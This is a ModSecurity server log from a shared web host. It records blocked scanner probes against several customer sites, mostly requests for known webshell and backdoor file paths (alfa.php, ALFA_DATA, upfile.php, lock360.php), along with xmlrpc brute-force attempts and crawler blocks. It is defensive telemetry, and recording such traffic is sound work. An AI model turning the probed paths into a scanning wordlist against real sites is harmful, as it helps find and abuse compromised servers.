[Tue May 26 13:50:53.087612 2026] [security2:error] [pid 560287:tid 560478] [client 15.235.169.50:63993] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/db5yjt/cache/wp-login.php"] [unique_id "ahVX5JmX5s6sDS3wJVcVBQAAAL4"]
[Tue May 26 13:50:53.595318 2026] [security2:error] [pid 560287:tid 560483] [client 15.235.169.50:64105] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVX5ZmX5s6sDS3wJVcVHAAAAMI"]
[Tue May 26 13:50:53.970044 2026] [security2:error] [pid 560287:tid 560438] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX5ZmX5s6sDS3wJVcVGwAAAJk"]
[Tue May 26 13:50:54.082346 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:64175] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/cache/themes.php"] [unique_id "ahVX5pmX5s6sDS3wJVcVJQAAAK4"]
[Tue May 26 13:50:54.548127 2026] [security2:error] [pid 560287:tid 560515] [client 15.235.169.50:64276] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/general/cache/plugins.php"] [unique_id "ahVX5pmX5s6sDS3wJVcVLQAAAOE"]
[Tue May 26 13:50:55.026066 2026] [security2:error] [pid 560287:tid 560439] [client 15.235.169.50:64341] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/sozorp/cache/about.php"] [unique_id "ahVX55mX5s6sDS3wJVcVMgAAAJo"]
[Tue May 26 13:50:55.243757 2026] [security2:error] [pid 560287:tid 560432] [client 20.196.127.68:14967] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/1.php"] [unique_id "ahVX55mX5s6sDS3wJVcVOQAAAJM"]
[Tue May 26 13:50:55.271426 2026] [security2:error] [pid 555743:tid 555892] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX5sjqAquC0YaxQjC1-gAAAR0"]
[Tue May 26 13:50:55.314718 2026] [security2:error] [pid 560287:tid 560432] [client 20.196.127.68:14967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/1.php"] [unique_id "ahVX55mX5s6sDS3wJVcVOQAAAJM"]
[Tue May 26 13:50:55.506398 2026] [security2:error] [pid 560287:tid 560467] [client 15.235.169.50:64391] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/upfile.php"] [unique_id "ahVX55mX5s6sDS3wJVcVPQAAALQ"]
[Tue May 26 13:50:55.927969 2026] [security2:error] [pid 560287:tid 560490] [client 20.196.127.68:14923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/2.php"] [unique_id "ahVX55mX5s6sDS3wJVcVRgAAAMk"]
[Tue May 26 13:50:55.984424 2026] [security2:error] [pid 560287:tid 560421] [client 15.235.169.50:64471] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ALFA_DATA/alfacgiapi/alfa.php"] [unique_id "ahVX55mX5s6sDS3wJVcVRwAAAIg"]
[Tue May 26 13:50:56.453993 2026] [security2:error] [pid 560287:tid 560552] [client 15.235.169.50:64548] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/upfile.php"] [unique_id "ahVX6JmX5s6sDS3wJVcVUgAAAQQ"]
[Tue May 26 13:50:56.528243 2026] [security2:error] [pid 560287:tid 560538] [client 20.196.127.68:17372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/7.php"] [unique_id "ahVX6JmX5s6sDS3wJVcVVgAAAPY"]
[Tue May 26 13:50:56.827250 2026] [security2:error] [pid 560287:tid 560506] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX6JmX5s6sDS3wJVcVUQAAANg"]
[Tue May 26 13:50:56.921380 2026] [security2:error] [pid 555743:tid 555931] [client 15.235.169.50:64621] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/js/privacy-tools.min.php"] [unique_id "ahVX6MjqAquC0YaxQjC2BgAAAUQ"]
[Tue May 26 13:50:57.176946 2026] [security2:error] [pid 555743:tid 555976] [client 20.196.127.68:17349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/10.php"] [unique_id "ahVX6cjqAquC0YaxQjC2CAAAAXE"]
[Tue May 26 13:50:57.417572 2026] [security2:error] [pid 560287:tid 560477] [client 15.235.169.50:64702] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/option-old.php"] [unique_id "ahVX6ZmX5s6sDS3wJVcVZAAAAL0"]
[Tue May 26 13:50:57.819888 2026] [security2:error] [pid 555743:tid 555906] [client 20.196.127.68:13522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/13.php"] [unique_id "ahVX6cjqAquC0YaxQjC2DAAAASs"]
[Tue May 26 13:50:57.900115 2026] [security2:error] [pid 560287:tid 560457] [client 15.235.169.50:64778] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/themes.php"] [unique_id "ahVX6ZmX5s6sDS3wJVcVcQAAAKo"]
[Tue May 26 13:50:58.388846 2026] [security2:error] [pid 560287:tid 560546] [client 15.235.169.50:64901] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/contact.php"] [unique_id "ahVX6pmX5s6sDS3wJVcVfwAAAP4"]
[Tue May 26 13:50:58.421900 2026] [security2:error] [pid 555743:tid 555962] [client 20.196.127.68:14935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/100.php"] [unique_id "ahVX6sjqAquC0YaxQjC2EwAAAWM"]
[Tue May 26 13:50:58.873145 2026] [security2:error] [pid 555743:tid 555907] [client 15.235.169.50:64972] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/admin.php"] [unique_id "ahVX6sjqAquC0YaxQjC2FgAAASw"]
[Tue May 26 13:50:59.094289 2026] [security2:error] [pid 555743:tid 555998] [client 20.196.127.68:14924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/222.php"] [unique_id "ahVX68jqAquC0YaxQjC2GgAAAYc"]
[Tue May 26 13:50:59.128611 2026] [security2:error] [pid 560287:tid 560516] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX6pmX5s6sDS3wJVcViQAAAOI"]
[Tue May 26 13:50:59.355644 2026] [security2:error] [pid 555743:tid 555877] [client 15.235.169.50:65026] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/system.php"] [unique_id "ahVX68jqAquC0YaxQjC2HQAAAQ4"]
[Tue May 26 13:50:59.770312 2026] [security2:error] [pid 560287:tid 560539] [client 20.196.127.68:15737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/adminfuns.php"] [unique_id "ahVX65mX5s6sDS3wJVcVoAAAAPc"]
[Tue May 26 13:50:59.821972 2026] [security2:error] [pid 555743:tid 556000] [client 15.235.169.50:65082] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/a.php"] [unique_id "ahVX68jqAquC0YaxQjC2JwAAAYk"]
[Tue May 26 13:51:00.316868 2026] [security2:error] [pid 560287:tid 560502] [client 15.235.169.50:65157] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-user-wp.php"] [unique_id "ahVX7JmX5s6sDS3wJVcVpwAAANQ"]
[Tue May 26 13:51:00.392690 2026] [security2:error] [pid 555743:tid 555964] [client 20.196.127.68:14953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/abcd.php"] [unique_id "ahVX7MjqAquC0YaxQjC2MQAAAWU"]
[Tue May 26 13:51:00.621690 2026] [security2:error] [pid 560287:tid 560462] [client 129.222.147.134:24653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX7JmX5s6sDS3wJVcVswAAAK8"]
[Tue May 26 13:51:00.621794 2026] [security2:error] [pid 560287:tid 560462] [client 129.222.147.134:24653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX7JmX5s6sDS3wJVcVswAAAK8"]
[Tue May 26 13:51:00.800238 2026] [security2:error] [pid 555743:tid 555951] [client 15.235.169.50:65247] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/x.php"] [unique_id "ahVX7MjqAquC0YaxQjC2NwAAAVg"]
[Tue May 26 13:51:00.960727 2026] [security2:error] [pid 555743:tid 555921] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX7MjqAquC0YaxQjC2MgAAATo"]
[Tue May 26 13:51:01.033617 2026] [security2:error] [pid 560287:tid 560439] [client 20.196.127.68:17356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/al.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcVvAAAAJo"]
[Tue May 26 13:51:01.251782 2026] [security2:error] [pid 560287:tid 560494] [client 91.230.225.172:31791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/bless.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcVwQAAAM0"]
[Tue May 26 13:51:01.267634 2026] [security2:error] [pid 560287:tid 560451] [client 15.235.169.50:65324] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/sylib.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcVxAAAAKU"]
[Tue May 26 13:51:01.336963 2026] [security2:error] [pid 555743:tid 555927] [client 106.192.248.115:49841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX7cjqAquC0YaxQjC2PgAAAUA"]
[Tue May 26 13:51:01.341803 2026] [security2:error] [pid 555743:tid 555927] [client 106.192.248.115:49841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX7cjqAquC0YaxQjC2PgAAAUA"]
[Tue May 26 13:51:01.630891 2026] [security2:error] [pid 560287:tid 560534] [client 20.196.127.68:14951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/alfa.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcVzwAAAPQ"]
[Tue May 26 13:51:01.747933 2026] [security2:error] [pid 560287:tid 560464] [client 15.235.169.50:65436] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/plugin.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcV0AAAALE"]
[Tue May 26 13:51:01.883403 2026] [security2:error] [pid 560287:tid 560512] [client 185.92.25.108:64509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/O-Simple.php"] [unique_id "ahVX7ZmX5s6sDS3wJVcV0gAAAN4"]
[Tue May 26 13:51:02.159264 2026] [security2:error] [pid 560287:tid 560315] [remote 207.46.13.154:4872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.13.46.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/siliconelevators-quality.php"] [unique_id "ahVX7pmX5s6sDS3wJVcV2AAA_xs"]
[Tue May 26 13:51:02.220005 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:65482] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/link.php"] [unique_id "ahVX7pmX5s6sDS3wJVcV2QAAAK4"]
[Tue May 26 13:51:02.269667 2026] [security2:error] [pid 560287:tid 560533] [client 20.196.127.68:15696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/as.php"] [unique_id "ahVX7pmX5s6sDS3wJVcV3AAAAPM"]
[Tue May 26 13:51:02.713272 2026] [security2:error] [pid 555743:tid 555882] [client 15.235.169.50:49181] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/user/wp-login.php"] [unique_id "ahVX7sjqAquC0YaxQjC2UgAAARM"]
[Tue May 26 13:51:02.795681 2026] [security2:error] [pid 560287:tid 560445] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX7pmX5s6sDS3wJVcV4AAAAJ8"]
[Tue May 26 13:51:02.848610 2026] [security2:error] [pid 560287:tid 560540] [client 20.196.127.68:17347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/aa.php"] [unique_id "ahVX7pmX5s6sDS3wJVcV6gAAAPg"]
[Tue May 26 13:51:03.205162 2026] [security2:error] [pid 560287:tid 560476] [client 15.235.169.50:49248] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/jp.php"] [unique_id "ahVX75mX5s6sDS3wJVcV8wAAALw"]
[Tue May 26 13:51:03.372483 2026] [security2:error] [pid 560287:tid 560515] [client 185.192.71.233:54623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/lock360.php"] [unique_id "ahVX75mX5s6sDS3wJVcV9AAAAOE"]
[Tue May 26 13:51:03.402391 2026] [security2:error] [pid 555743:tid 555918] [client 114.119.128.77:20875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/87865-krem-dlya-uvelichenie-chlen-vredno-ili-net.xml"] [unique_id "ahVX78jqAquC0YaxQjC2WgAAATc"], referer: http://www.freshsend.cz/upload/kc/files/19549-kremy-dlya-realnogo-uvelicheniya-chlena.xml
[Tue May 26 13:51:03.464320 2026] [security2:error] [pid 560287:tid 560463] [client 20.196.127.68:15705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/abc.php"] [unique_id "ahVX75mX5s6sDS3wJVcV-gAAALA"]
[Tue May 26 13:51:03.685607 2026] [security2:error] [pid 555743:tid 555885] [client 15.235.169.50:49333] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/dir/wp-login.php"] [unique_id "ahVX78jqAquC0YaxQjC2YAAAARY"]
[Tue May 26 13:51:03.934185 2026] [security2:error] [pid 560287:tid 560430] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX75mX5s6sDS3wJVcV_QAAAJE"]
[Tue May 26 13:51:03.986962 2026] [security2:error] [pid 560287:tid 560518] [client 114.119.153.186:43571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/karabaglar-bosch-servisi-tel-348-98-98.html"] [unique_id "ahVX75mX5s6sDS3wJVcWBgAAAOQ"], referer: https://sosyal2.typepad.com/blog/page/11/
[Tue May 26 13:51:04.054788 2026] [security2:error] [pid 555743:tid 555956] [client 20.196.127.68:13523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/av.php"] [unique_id "ahVX8MjqAquC0YaxQjC2aAAAAV0"]
[Tue May 26 13:51:04.142336 2026] [security2:error] [pid 560287:tid 560482] [client 15.235.169.50:49397] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-scr1pts.php"] [unique_id "ahVX8JmX5s6sDS3wJVcWBwAAAME"]
[Tue May 26 13:51:04.637064 2026] [security2:error] [pid 560287:tid 560506] [client 20.196.127.68:15733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/autoload_classmap.php"] [unique_id "ahVX8JmX5s6sDS3wJVcWEwAAANg"]
[Tue May 26 13:51:04.638985 2026] [security2:error] [pid 560287:tid 560542] [client 15.235.169.50:49463] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-22.php"] [unique_id "ahVX8JmX5s6sDS3wJVcWFAAAAPo"]
[Tue May 26 13:51:04.891633 2026] [security2:error] [pid 560287:tid 560470] [client 185.92.25.101:51103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/zwso.php"] [unique_id "ahVX8JmX5s6sDS3wJVcWFQAAALY"]
[Tue May 26 13:51:05.117787 2026] [security2:error] [pid 560287:tid 560484] [client 15.235.169.50:49561] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/crop/wp-admin.php"] [unique_id "ahVX8ZmX5s6sDS3wJVcWHgAAAMM"]
[Tue May 26 13:51:05.256140 2026] [security2:error] [pid 555743:tid 555996] [client 20.196.127.68:13527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/asus.php"] [unique_id "ahVX8cjqAquC0YaxQjC2cQAAAYU"]
